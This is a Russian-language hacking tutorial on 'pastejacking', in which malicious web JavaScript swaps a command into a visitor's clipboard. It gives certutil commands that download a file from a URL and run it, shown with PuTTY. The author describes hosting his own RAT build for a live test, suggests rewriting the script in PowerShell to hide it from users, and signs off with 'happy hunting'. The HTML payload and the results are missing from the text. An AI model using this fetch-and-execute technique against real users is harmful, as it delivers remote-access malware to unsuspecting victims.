Pastejacking. Заражаем компьютер без файла вируса
Ранее подобные атаки задействовали буфер обмена, в который копировалась зловредная команда с частью кода css. Позже атака была улучшена - вместо css было предложено использовать javascript. Именно этот метод атаки и получил название Pastejacking.
Для жертв опасность этой атаки состоит в том, что достаточно скопировать хотя бы один символ, никакого кода видно не будет, это может быть обычный смайлик. Этой атаке подвержены машины Windows и Linux на борту.
Сегодня мы рассмотрим метод поставки нашего вируса/пейлоада на целевой ПК при помощи команды в cmd. Без файлов. Совсем.
Приступим!
Для начала хочу показать вам фичу, при помощи которой в Windows можно скачивать файлы, называется она certutil.
К примеру, чтобы скачать программу PuTTY команда в cmd должна быть такой:
certutil -urlcache -split -f https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe
Что-бы скачать и запустить файл, нужно добавить команду открытия файла, просто добавляем & имя файла.exe. Итоговая команда (в случае с путти) выглядит так:
certutil -urlcache -split -f https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe & putty.exe
Выполнив эту команду, у нас скачается и запустится путти:
С запуском в cmd разобрались, теперь перейдём к Pastejacking'у. Я подготовил простой html файл:
Теперь разберём как это работает.
Теперь протестируем в боевых условиях. Я сделал билд РАТника и загрузил его на свой сервер, ведь нам нужна прямая ссылка на файл(!)
Результат:
Заключение
Как видишь, для загрузки вируса на ПК в некоторых случаях ненужен даже бинарник (относительно).
В идеале скрипт можно переделать под powershell, скрыть от пользователя. Но не стоит недооценивать данный вектор атак. Если статья зайдёт, сделаю продолжение, где работать мы будем через Kali Linux с одним интересным инструментом для безфайловых атак.
На сегодня это все. Удачной охоты!